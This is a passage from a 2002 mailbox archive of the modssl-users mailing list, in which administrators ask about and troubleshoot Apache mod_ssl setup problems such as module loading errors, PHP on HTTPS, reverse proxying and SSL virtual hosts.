Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA04894; Fri, 16 Aug 2002 08:54:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA04883; Fri, 16 Aug 2002 08:54:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8F0444CE74B; Fri, 16 Aug 2002 08:53:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 7779B28698; Fri, 16 Aug 2002 08:53:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from adrock.dataverse.com id DAA28153; Fri, 16 Aug 2002 03:48:44 +0200 (MET DST)
From: webmaster@isbankrupt.com
Received: from nubox (ip68-5-242-241.oc.oc.cox.net [68.5.242.241])
	by adrock.dataverse.com (8.11.0/8.11.0) with SMTP id g7G1kGX09781
	for ; Thu, 15 Aug 2002 18:46:16 -0700
Message-ID: <042401c244c7$0a7f49d0$6401a8c0@nubox>
To: 
Subject: mod_ssl & php. PHP not working on https pages
Date: Thu, 15 Aug 2002 18:48:38 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0421_01C2448C.5DE4EF70"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: webmaster@isbankrupt.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0421_01C2448C.5DE4EF70
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi good modssl people,

I'm having an issue where Apache won't handle .php files on https pages. =
http works fine, and parses php properly. Apache seems to ignore the =
"AddType application/x-httpd-php .php" directive on https sites. both =
php and mod_ssl are running as DSO's. Running Apache 1.3.26, Mod_ssl =
2.1.10, and PHP 4.2.2. When calling a .php file from an https site, I =
get a file save dialog.

Anyone seen this? Any help would be greatly appreciated!

-Shon

------=_NextPart_000_0421_01C2448C.5DE4EF70
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi good modssl people,


 


I'm having an issue where Apache won't =
handle .php=20
files on https pages. http works fine, and parses php properly. Apache =
seems to=20
ignore the "AddType application/x-httpd-php .php" directive on https =
sites. both=20
php and mod_ssl are running as DSO's. Running Apache 1.3.26, Mod_ssl =
2.1.10, and=20
PHP 4.2.2. When calling a .php file from an https site, I get a file =
save=20
dialog.


 


Anyone seen this? Any help would be =
greatly=20
appreciated!


 


-Shon


------=_NextPart_000_0421_01C2448C.5DE4EF70--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 08:55:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA04897; Fri, 16 Aug 2002 08:54:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA04885; Fri, 16 Aug 2002 08:54:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AB1424CE75F; Fri, 16 Aug 2002 08:53:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4006C286D2; Fri, 16 Aug 2002 08:52:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nis.acs.uci.edu id WAA21435; Thu, 15 Aug 2002 22:28:50 +0200 (MET DST)
Received: from tesuji.nac.uci.edu (tesuji.nac.uci.edu [128.200.34.35]) by nis.acs.uci.edu (8.9.3/) with ESMTP id NAA28036; Thu, 15 Aug 2002 13:28:40 -0700 (PDT)
Received: (from strombrg@localhost) by tesuji.nac.uci.edu (8.9.3/) id NAA13631; Thu, 15 Aug 2002 13:28:09 -0700
Date: Thu, 15 Aug 2002 13:28:09 -0700
From: Dan Stromberg 
To: modssl-users@modssl.org
Cc: strombrg@nis.acs.uci.edu
Subject: cannot load modssl
Message-ID: <20020815132809.P11151@tesuji.nac.uci.edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="lRF4gxo9Z9M++D0O"
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan Stromberg 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--lRF4gxo9Z9M++D0O
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

I built (tried to build) modssl as a module for apache.


When I try to run apache, I get:

decalpha-root> /usr/bin/httpd -d /Web -DSSL               =20
Syntax error on line 206 of /Web/conf/httpd.conf:
Cannot load /dcs/packages/infosys/apache/libexec/libssl.so into server:
dlopen: cannot load /dcs/packages/infosys/apache/libexec/libssl.so


A system call trace shows (please pardon me if I didn't get the line
wrapping undone correctly) :

mmap ( 0x3004382e000, 4048, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|M=
AP_VA
RIABLE|MAP_PRIVATE, -1, 0 ) =3D 0x4382e000
close (5) =3D 0
stat ("/dcs/packages/infosys/apache/libexec/libssl.so", 0x3ffc0001d30) =3D =
0 [ , <
129.0.39381905 -rwxr-xr-x 1 dcslib users 221184 1029433580,1029433580,10294=
33580 > ]
getrlimit ( RLIMIT_DATA, 0x11fffce48 ) =3D 0 [ , {134217728,1073741824} ]
mmap ( 0x3ffc0016000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|M=
AP_VA
RIABLE|MAP_PRIVATE, -1, 0 ) =3D 0xffffffffc0016000
open ("/dcs/packages/MySQL/lib/mysql/libssl.so", O_RDONLY, 30000211552) =3D=
 -1, Er
rno 2 (No such file or directory)
open ("/dcs/packages/infosys/php-ext/pdflib/lib/libssl.so", O_RDONLY, 30000=
21155
7) =3D -1, Errno 2 (No such file or directory)
open ("/dcs/packages/infosys/php-ext/freetds-0.53/lib/libssl.so", O_RDONLY,=
 3000
0211551) =3D -1, Errno 2 (No such file or directory)
open ("/dcs/packages/perl-5.6.0/lib/5.6.0/alpha-dec_osf/CORE/libssl.so", O_=
RDONL
Y, 30000211552) =3D -1, Errno 2 (No such file or directory)


/dcs/packages/infosys/apache/libexec/libssl.so is indeed where the SO in
question lives.


Also:

decalpha-root> file /dcs/packages/infosys/apache/libexec/libssl.so
/dcs/packages/infosys/apache/libexec/libssl.so: COFF format alpha shared
library, demand paged executable or object module stripped - version
3.11-10=20


I'm using apache 1.3.26, mod_ssl 2.8.10-1.3.26, and openssl 0.9.6e.


mod_ssl was ./configured with:

=2E/configure --with-apache=3D/dcslibsrc/infosys/apache-httpd/apache/`systy=
pe` \
  --prefix=3D/dcs/packages/infosys/apache-$vers \
  --with-ssl=3D/dcs/packages/openssl


The OS I'm on is Tru64 4.0D, but I hope to run the resulting binary on a
variety of more recent Tru64 machines.


I'm not getting a core dump, in fact httpd doesn't even start.  I just
get the error mentioned above.


The daemon runs fine without -DSSL.


As probably happens too often on this list, this matter is rather urgent
for us.


Thanks.

--=20
Dan Stromberg                                               UCI/NACS/DCS

--lRF4gxo9Z9M++D0O
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9XA7Yo0feVm00f/8RArIPAJ4sTM9iNpKeWO59bdxp6GBus5KZuACgm3b+
e85dcZeSq8ThVRb6vFRxad8=
=/U6D
-----END PGP SIGNATURE-----

--lRF4gxo9Z9M++D0O--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 10:40:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA08690; Fri, 16 Aug 2002 10:39:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from srrdc013dmz03.rdc.nl id KAA08685; Fri, 16 Aug 2002 10:38:34 +0200 (MET DST)
Received: from srrdc006srv02.services.rdc.net (srrdc006srv02.services.rdc.net [217.115.224.166])
	by srrdc013dmz03.rdc.nl (8.9.3+Sun/8.9.3) with ESMTP id KAA12861
	for ; Fri, 16 Aug 2002 10:38:24 +0200 (MET DST)
Received: from rdc.nl (pcrs.rdcka.rdc.net [172.31.1.24])
	by srrdc006srv02.services.rdc.net (8.9.3+Sun/8.9.3) with ESMTP id KAA16519
	for ; Fri, 16 Aug 2002 10:37:43 +0200 (MET DST)
Message-ID: <3D5CBA03.2080200@rdc.nl>
Date: Fri, 16 Aug 2002 10:38:27 +0200
From: Danny Kruitbosch 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.8) Gecko/20020204
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL reverse proxy + Client Cert auth
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Danny Kruitbosch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

We want to build the following situation:

- Apache with mod_ssl as a reverse SSL proxy (Client  --->  SSL/HTTPS 
---> Rev. proxy ---> HTTP ---> Web/App server)
- We need to check for client certificates. These certs are handed out 
by another party (not a real TTP). We need to check the signature on the 
client certs and the validity of the client certs.


What's the best way to do this. I've read the mod_ssl manual, but I 
don't understand how I can check client certs from another (third) party.

How do I setup Apache as an SSL reverse proxy?

Any help on this would be great!

Cheers,

Danny Kruitbosch

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 16:01:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA16377; Fri, 16 Aug 2002 16:00:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.gt-est.net id PAA16256; Fri, 16 Aug 2002 15:59:56 +0200 (MET DST)
Received: from frutiger.masseco.com (h209-71-204-60.gtconnect.net [209.71.204.60])
	by smtp.gt-est.net (Postfix) with ESMTP id 390CFC1EC
	for ; Fri, 16 Aug 2002 09:59:55 -0400 (EDT)
Message-Id: <5.1.0.14.0.20020816100427.02e07a60@mail.masseco.com>
X-Sender: eric@mail.masseco.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Fri, 16 Aug 2002 10:04:46 -0400
To: modssl-users@modssl.org
From: =?iso-8859-1?Q?=C9ric?= Le Gallais 
Subject: SSLPassPhraseDialog on win32
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA16281
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?=C9ric?= Le Gallais 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm trying to get apache + mod_ssl work on Win32, but I'm getting this message:
----
Init: SSLPassPhraseDialog builtin is not supported on Win32 (key file 
E:/Apache2/conf/ssl/www.domaine.dom.key)
----
in the error.log file.

Is there anything I can do to make that work?
What exec program can I use on Win32 instead of the builtin type?
Should I get rid of the password in the key?


Thanks

Éric

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 16:09:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA16960; Fri, 16 Aug 2002 16:08:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA16955; Fri, 16 Aug 2002 16:07:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2BFC34CE75C; Fri, 16 Aug 2002 16:07:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 10C8D28830; Fri, 16 Aug 2002 15:57:42 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ntexchange.qfa.quinnfable.com id PAA15892; Fri, 16 Aug 2002 15:41:24 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: can't load  /usr/local/apach2/modules/mod_sll.so into server   undefined symbol x509_free  
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Date: Fri, 16 Aug 2002 09:41:12 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: Regarding mod_ssl version which suits apache 2.0.39
Thread-Index: AcI5n0yf9QMImt83TXC67I3PeIec3wLinNZl
From: "Venkat Reddy Valluri" 
To: "R. DuFresne" 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA15898
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Venkat Reddy Valluri" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
   I installed openssl 0.9.6g engine on redhat 7.3 over which i installed apache 2.0.39, It seems installation to be successful,
  but when i tried to start apache with sll
    ./apachecntl startssl
     iam getiing
       can't load /usr/local/apache2/modules/mod_ssl.so into server /usr/local/apache2/modules/mod_ssl.so

      Any help greatly apprecitated   

Thks in advance
Venkat
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 16:09:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA16963; Fri, 16 Aug 2002 16:08:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA16956; Fri, 16 Aug 2002 16:07:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1C0DA4CE683; Fri, 16 Aug 2002 16:07:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 777DD28698; Fri, 16 Aug 2002 15:57:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pr1-exch01.payroll1.com id OAA14774; Fri, 16 Aug 2002 14:49:41 +0200 (MET DST)
Received: by PR1-EXCH01 with Internet Mail Service (5.5.2653.19)
	id ; Fri, 16 Aug 2002 08:45:08 -0400
Received: from ameritech.net (10.0.0.125 [10.0.0.125]) by pr1-exch01.payroll1.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id QNFN624T; Fri, 16 Aug 2002 08:45:05 -0400
From: =?iso-8859-1?Q?Thomas_Gagn=E9?= 
To: modssl-users@modssl.org
Message-ID: <3D5CF4E3.5060306@ameritech.net>
Date: Fri, 16 Aug 2002 08:49:39 -0400
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
Subject: Re: SSL reverse proxy + Client Cert auth
References: <3D5CBA03.2080200@rdc.nl>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Thomas_Gagn=E9?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm not sure about checking another authority, but suspect the configs 
would be in conf/ssl.conf.  For doing the reverse proxying, I edited 
proxy.conf and included it inside ssl.conf.  Inside proxy.conf, 
statements like:

    ProxyPass /cgi/ http://10.0.10.1/cgi/
    ProxyPassReverse /cgi/ http://10.0.10.1/cgi/

are what accomplishes the reverse proxying.  In our case, https: comes 
into the proxy and we talk (behind the DMZ) http to the web servers.

Danny Kruitbosch wrote:

> Hi,
>
> We want to build the following situation:
>
> - Apache with mod_ssl as a reverse SSL proxy (Client  --->  SSL/HTTPS 
> ---> Rev. proxy ---> HTTP ---> Web/App server)
> - We need to check for client certificates. These certs are handed out 
> by another party (not a real TTP). We need to check the signature on 
> the client certs and the validity of the client certs.
>
>
> What's the best way to do this. I've read the mod_ssl manual, but I 
> don't understand how I can check client certs from another (third) party.
>
> How do I setup Apache as an SSL reverse proxy?
>
> Any help on this would be great!
>
> Cheers,
>
> Danny Kruitbosch
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

-- 
.tom


-- 
.tom
http://isectd.sourceforge.net

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 18:17:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA20434; Fri, 16 Aug 2002 18:16:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id SAA20371; Fri, 16 Aug 2002 18:15:05 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA08305;
	Fri, 16 Aug 2002 12:13:52 -0400
Date: Fri, 16 Aug 2002 12:13:52 -0400 (EDT)
From: "R. DuFresne" 
To: Venkat Reddy Valluri 
cc: modssl-users@modssl.org
Subject: Re: can't load  /usr/local/apach2/modules/mod_sll.so into server  
 undefined symbol x509_free  
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


didyou install openssl with shared libs?  I recall this being a
requirement for the apache 2 code.  Also there is a newer version of
apache available, it is a security update.

Thanks,

Ron DuFresne

On Fri, 16 Aug 2002, Venkat Reddy Valluri wrote:

> Hi,
>    I installed openssl 0.9.6g engine on redhat 7.3 over which i installed apache 2.0.39, It seems installation to be successful,
>   but when i tried to start apache with sll
>     ./apachecntl startssl
>      iam getiing
>        can't load /usr/local/apache2/modules/mod_ssl.so into server /usr/local/apache2/modules/mod_ssl.so
> 
>       Any help greatly apprecitated   
> 
> Thks in advance
> Venkat
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 21:17:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25116; Fri, 16 Aug 2002 21:16:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pina.terra.com.br id VAA25112; Fri, 16 Aug 2002 21:15:25 +0200 (MET DST)
Received: from penha.terra.com.br (penha.terra.com.br [200.176.3.43])
	by pina.terra.com.br (Postfix) with ESMTP id CA02D53434
	for ; Fri, 16 Aug 2002 16:15:23 -0300 (EST)
Received: from spiff.ddns.info (unknown [200.203.68.1])
	(authenticated user iuri.f)
	by penha.terra.com.br (Postfix) with ESMTP id B33A5682D0
	for ; Fri, 16 Aug 2002 16:15:23 -0300 (EST)
Content-Type: text/plain;
  charset="us-ascii"
From: Iuri Fiedoruk 
Organization: IndexZero
To: modssl-users@modssl.org
Subject: mod_sll + virtual hosts
Date: Fri, 16 Aug 2002 16:12:45 -0300
User-Agent: KMail/1.4.2
MIME-Version: 1.0
Message-Id: <200208161612.45528.iuri.f@terra.com.br>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA25113
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Iuri Fiedoruk 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When I try to load apache, I get the error:
[Fri Aug 16 15:11:41 2002] [warn] NameVirtualHost zzzzzzzz:80 has no 
VirtualHosts
[Fri Aug 16 15:11:41 2002] [warn] NameVirtualHost yyyyyyyyyy:80 has no 
VirtualHosts
[Fri Aug 16 15:11:41 2002] [warn] NameVirtualHost xxxxxxxxxxx:80 has no 
VirtualHosts
/usr/local/apache/bin/apachectl startssl: httpd could not be started

contrary to what it says, http runs, but without ssl and I have virtualhosts 
for each namevirtualhost.

How should I make my virtual hosts work with mod_sll? Can someone please 
provide a example?


-- 
Iuri Fiedoruk
Santa Maria, RS, Brazil

GnuPG Key fingerprint = 9D5F 7FA6 EF2C 6A5E 914F  E01B 9434 AA7D 032B 240F
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 17 15:01:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA15001; Sat, 17 Aug 2002 15:00:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from gristlepit.com id OAA14883; Sat, 17 Aug 2002 14:59:33 +0200 (MET DST)
Received: (qmail 25039 invoked from network); 17 Aug 2002 12:59:21 -0000
Received: from unknown (HELO 24.167.48.176) (216.118.56.26)
  by gristlepit.com with SMTP; 17 Aug 2002 12:59:21 -0000
Message-ID: 
X-Mailer: BasiliX 1.1.0 -- http://basilix.org
X-SenderIP: 24.167.48.176
Date: Sat, 17 Aug 2002 07:59:21 CDT
From: Ron Ridley 
Subject: Re: mod_sll   virtual hosts
To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ron Ridley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try something like this using IP based virtual hosts:
Each one of your virtual hosts can have different SSL key material it points to.

#------------ This section only goes in the conf file once ---------------------
Port 80
ServerName domain.com
NameVirtualHost x.x.x.x

#--------------------- Domain.com -------------------------
 

ServerAdmin root@domain.com
DocumentRoot /home/httpd/html/
ServerName domain.com
ServerAlias domain.com www.domain.com
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
CustomLog logs/domain.com_log combined
ScriptAlias /cgi-bin/ /home/httpd/cgi-bin/



ServerAdmin root@domain.com
DocumentRoot /home/httpd/html/
ServerName domain.com  #name on certificate
SSLEngine on
SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca.crt
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
SSLLog logs/ssl_engine_log
SSLLogLevel warn
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
CustomLog logs/domain.com_log combined
ScriptAlias /cgi-bin/ /home/httpd/cgi-bin/



Repeat the domain.com section for the other domains you need.

-Ron

On 16 Aug 2002 19:17 CDT you wrote:

> When I try to load apache, I get the error:
> [Fri Aug 16 15:11:41 2002] [warn] NameVirtualHost zzzzzzzz:80 has no 
> VirtualHosts
> [Fri Aug 16 15:11:41 2002] [warn] NameVirtualHost yyyyyyyyyy:80 has no 
> VirtualHosts
> [Fri Aug 16 15:11:41 2002] [warn] NameVirtualHost xxxxxxxxxxx:80 has no 
> VirtualHosts
> /usr/local/apache/bin/apachectl startssl: httpd could not be started
> 
> contrary to what it says, http runs, but without ssl and I have virtualhosts 
> for each namevirtualhost.
> 
> How should I make my virtual hosts work with mod_sll? Can someone please 
> provide a example?
> 
> 
> -- 
> Iuri Fiedoruk
> Santa Maria, RS, Brazil
> 
> GnuPG Key fingerprint = 9D5F 7FA6 EF2C 6A5E 914F  E01B 9434 AA7D 032B 240F
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 17 15:09:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA15510; Sat, 17 Aug 2002 15:08:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from cm1.ethome.net.tw id PAA15506; Sat, 17 Aug 2002 15:07:37 +0200 (MET DST)
Received: (qmail 20483 invoked from network); 17 Aug 2002 13:07:28 -0000
Received: from jindosoul.netzbe.com (HELO jindosoul) (192.168.0.1)
  by 0 with SMTP; 17 Aug 2002 13:07:28 -0000
From: "Jindo" 
To: 
Subject: Is OpenSSL + ModSSL 128 bit encryption capable?
Date: Sat, 17 Aug 2002 21:07:27 +0800
Message-ID: <000401c245ef$097a8580$b117db3d@jindosoul>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jindo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Good Day,

My web server softwares are:

- OpenSSL 0.96g
- mod_ssl 2.8.10
- Apache 1.26

My ISP told me this combination could only support 40-bit cipher
strength.  However, on mod_ssl official page, I did see:

   128-bit strong cryptography world-wide

In order to clarify this, would experienced modssl users confirm it for
me that I could

1. Buy 128-bit certificate from CA
2. Install the CA on my server with the above configuration
3. Browser with 128-bit cipher strength may communicate with my server
using 128-bit encryption.

Thanks :-)

Yours truly,

Jindo

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 17 16:25:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA17456; Sat, 17 Aug 2002 16:24:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id QAA17451; Sat, 17 Aug 2002 16:24:04 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7HELaUB031792
	for ; Sat, 17 Aug 2002 10:21:36 -0400
Date: Sat, 17 Aug 2002 10:21:36 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: mod_sll   virtual hosts
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 17 Aug 2002, Ron Ridley wrote:

> Try something like this using IP based virtual hosts: Each one of your
> virtual hosts can have different SSL key material it points to.
> #------------ This section only goes in the conf file once ---------------------
> Port 80
> ServerName domain.com
> NameVirtualHost x.x.x.x
> #--------------------- Domain.com -------------------------
> 


Um, if I'm following this discussion correctly, I believe this advice is
mistaken.  NameVirtualHost's can *NOT* be used with SSL.  Every name-based
vhost would in reality get the certificate of the first one listed in the
config file.

Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#ToC47 .

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 17 16:31:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA17627; Sat, 17 Aug 2002 16:30:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
